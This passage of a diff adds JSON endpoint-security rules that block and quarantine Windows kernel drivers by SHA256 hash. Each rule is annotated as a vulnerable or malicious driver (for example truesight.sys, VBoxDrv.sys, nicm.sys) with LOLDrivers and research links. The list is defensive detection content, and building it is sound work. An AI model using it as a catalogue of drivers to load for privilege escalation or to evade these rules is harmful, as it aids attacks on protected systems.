"rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.982414Z", + "creation_date": "2026-03-23T11:45:29.982416Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.982421Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "a2b0b2e9e458016b22ebbf47411008f0a87efd9103b125870ce37246ab5bdff0", + "comment": "Vulnerable Kernel Driver (aka aswVmm.sys) [https://www.loldrivers.io/drivers/a845a05c-5357-4b78-9783-16b4d34b2cb0/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "0a4fe9b3-0c6b-55d4-adf4-fbfa1f735f13", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.825593Z", + "creation_date": "2026-03-23T11:45:31.825595Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.825600Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "ec3003c1ace455256ab24047d65f50436268e6a1f9ed7f1058a3ee77672a21f8", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) 
[https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "0a529ee2-9b47-597d-a1a2-9fb14b7e6ea5", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.477708Z", + "creation_date": "2026-03-23T11:45:31.477712Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.477723Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "ee55d61ce6082a9f8ff1e8e9fe83e1b52890d59260a12edcb44afb3a5250a537", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "0a54338d-758c-5467-b153-dd1318ccdc80", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.981402Z", + "creation_date": 
"2026-03-23T11:45:29.981404Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.981410Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "cf66fcbcb8b2ea7fb4398f398b7480c50f6a451b51367718c36330182c1bb496", + "comment": "Vulnerable Kernel Driver (aka BEDAISY.SYS) [https://www.loldrivers.io/drivers/db666d40-c9fa-4039-bfac-a5d7afd61b67/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "0a5abda5-9e61-552f-aaba-fe7d2289d432", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.608223Z", + "creation_date": "2026-03-23T11:45:29.608228Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.608233Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "8f17b59039d2d47d6c653a7abce7b4b24e20e5501ac9fb1ec6893873f4cf006e", + "comment": "VirtualBox VBoxDrv vulnerable driver (aka VBoxDrv.sys) [CVE-2008-3431] [https://www.loldrivers.io/drivers/79542852-3a0c-43bc-bfa3-3eeb0e1d7fd2/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "0a5b7f1c-051b-5d2d-ad3c-5b4c4fad75e8", + "test_maturity_current_count": 0, + 
"test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.823851Z", + "creation_date": "2026-03-23T11:45:31.823853Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.823859Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "1cb5cd25ba016bb5aa00c045dd437332fa72994054c106ea0e259ce5ab25a9e1", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "0a5c4486-23c5-59d6-a877-eda5c41e6614", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.453011Z", + "creation_date": "2026-03-23T11:45:30.453014Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.453023Z", + "rule_level": null, + 
"rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "e728b259113d772b4e96466ab8fe18980f37c36f187b286361c852bd88101717", + "comment": "Vulnerable Kernel Driver (aka nicm.sys) [https://www.loldrivers.io/drivers/86cff0de-2536-4b8d-a846-a7312c569597/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "0a5feb19-4a14-5a6e-bce6-f04a61b1fc5d", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.491849Z", + "creation_date": "2026-03-23T11:45:31.491851Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.491856Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "624168346c02a53d6ca4dcd027538f26dab8e065511538d2c935e67ce72aa111", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "0a65c004-7909-54ea-9757-9f2ee1cac567", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": 
"af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.142506Z", + "creation_date": "2026-03-23T11:45:31.142508Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.142514Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "921f3df0ae9e95f2195ee2dd2ef21d044e63ade12c1ad494378e6f3b55793402", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "0a70c169-f44e-57ce-aecd-8a29585ea16e", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:32.144129Z", + "creation_date": "2026-03-23T11:45:32.144131Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:32.144136Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "94b87b1cdaf1d86c2bc4eacef45608d0f16fdd3b981b88cdddc16b6bc64fe25d", + "comment": 
"Malicious Kernel Driver (aka idmtdi.sys) [https://www.loldrivers.io/drivers/c2e98102-2055-48f0-9449-3e7a7f2c0ffe/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "0a70e384-b711-5965-88f3-cf3e71c5f093", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.820513Z", + "creation_date": "2026-03-23T11:45:30.820515Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.820520Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "c3db6290145dc8905c0f97e218e0ef071f435a6ffaf1ed4c0699605d9a540038", + "comment": "Vulnerable Kernel Driver (aka rtport.sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "0a7c82e3-b069-5c07-a04f-4d2c35bc2aa9", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.475730Z", + "creation_date": 
"2026-03-23T11:45:30.475744Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.475753Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "d16a59cd7c52d1d32bb43670cdca739aadb19ba15996bac62071845e1bfbdb95", + "comment": "Malicious Kernel Driver (aka wfshbr64.sys) [https://www.loldrivers.io/drivers/ddf661c0-7dfc-4c26-89c5-00cd6a81a139/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "0a8b0cc6-e401-55af-921d-57af9a41fdc0", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.826407Z", + "creation_date": "2026-03-23T11:45:30.826409Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.826415Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "1a5825678ad989a0a02642a001aad3504e2487e0b88c836327ff56d7f9c9ea49", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "0a8bbc39-5a9b-53bc-ab72-0d678e4cf286", + 
"test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.453783Z", + "creation_date": "2026-03-23T11:45:30.453787Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.453796Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "16e924aa8ced646c2ee99602b523f511ea386b78ed78a3d265a560fb64e88ee3", + "comment": "Vulnerable Kernel Driver (aka nicm.sys) [https://www.loldrivers.io/drivers/86cff0de-2536-4b8d-a846-a7312c569597/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "0a90a483-aa0c-51e0-8d2d-a9878fe0399b", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.809990Z", + "creation_date": "2026-03-23T11:45:31.809993Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.809999Z", + "rule_level": null, + 
"rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "d512fe03a7722259d0c3b23db809c2c2c4dc8dfc2ac2ec9a2d49447c875e6d58", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "0a95640b-f703-529f-b9c6-06da7973b899", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.985008Z", + "creation_date": "2026-03-23T11:45:29.985010Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.985016Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "80cbba9f404df3e642f22c476664d63d7c229d45d34f5cd0e19c65eb41becec3", + "comment": "Dangerous Physmem Kernel Driver (aka Dh_Kernel.Sys) [https://www.loldrivers.io/drivers/dfce8b0f-d857-4808-80ef-61273c7a4183/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "0aacd36d-1371-50a7-b3cc-683dfacd1166", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + 
"source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.619456Z", + "creation_date": "2026-03-23T11:45:29.619458Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.619464Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "1044ea40d459fe4c619a44afe53e6ff5a9cc5a37cf568d974ae23ed62da58759", + "comment": "Realtek vulnerable driver (aka rtkio64.sys, rtkiow10x64.sys and rtkiow8x64.sys) [https://github.com/blogresponder/Realtek-rtkio64-Windows-driver-privilege-escalation] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "0aae4fa0-32fa-53f6-97b5-020c5cc7aa11", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.977171Z", + "creation_date": "2026-03-23T11:45:29.977173Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.977179Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "f4c7e94a7c2e49b130671b573a9e4ff4527a777978f371c659c3f97c14d126de", + 
"comment": "ASUS vulnerable VGA Kernel Mode Driver (aka EIO.sys) [https://www.loldrivers.io/drivers/f654ad84-c61d-477c-a0b2-d153b927dfcc/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "0ab1e3ae-62ad-5cb0-969f-d240a36e541c", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.459957Z", + "creation_date": "2026-03-23T11:45:30.459960Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.459969Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "07fb2bb6c852f6a6fe982b2232f047e167be39738bac26806ffe0927ba873756", + "comment": "Vulnerable Kernel Driver (aka LgDataCatcher.sys) [https://www.loldrivers.io/drivers/5961e133-ccc3-4530-8f4f-5d975c41028d/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "0ab44ddc-9a3e-569c-aca9-f2bf35d24ca3", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.478192Z", + "creation_date": 
"2026-03-23T11:45:30.478195Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.478204Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "5504258361f72faa2b35b15e0fd9edbcbcc30a4d99ef68a7805898cf75d8c809", + "comment": "Vulnerable Kernel Driver (aka elbycdio.sys) [https://www.loldrivers.io/drivers/855ade1f-8a9e-4c9d-ab8e-d7e409609852/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "0abbcaed-d0c2-5422-a3b5-764e3ae004bd", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.978958Z", + "creation_date": "2026-03-23T11:45:29.978960Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.978966Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "7ff8fe4c220cf6416984b70a7e272006a018e5662da3cedc2a88efeb6411b4a4", + "comment": "Vulnerable Kernel Driver (aka netfilter2.sys) [https://www.loldrivers.io/drivers/5ad8a3b6-6d20-4c95-8fa7-9a507167ba3c/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "0abc5513-cce1-5994-95b2-8ef1fd4f3de5", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, 
+ "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.480046Z", + "creation_date": "2026-03-23T11:45:30.480048Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.480053Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "ce0a4430d090ba2f1b46abeaae0cb5fd176ac39a236888fa363bf6f9fd6036d9", + "comment": "Vulnerable Kernel Driver (aka iscflashx64.sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "0abdc52b-4524-5d86-b58e-61d691799b48", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.453941Z", + "creation_date": "2026-03-23T11:45:30.453952Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.453961Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + 
"rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "d5b270ac8ca4f87ba51eafb3b28102875bdbdde0f15520ec0a629d8a898c0b2e", + "comment": "Malicious Kernel Driver (aka 4118b86e490aed091b1a219dba45f332.sys) [https://www.loldrivers.io/drivers/b32d8d7d-0dc2-4d09-a306-8efc4caf1839/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "0abe08e4-bbe8-598b-b0a7-d01a839cefc7", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:32.143169Z", + "creation_date": "2026-03-23T11:45:32.143171Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:32.143176Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "1f8168036d636aad1680dd0f577ef9532dbb2dad3591d63e752b0ba3ee6fd501", + "comment": "Vulnerable Kernel Driver (aka iQVW64.SYS) [https://www.loldrivers.io/drivers/4dd3289c-522c-4fce-b48e-5370efc90fa1/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "0abf7a43-0d01-5c5f-a670-01e7b01178cd", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + 
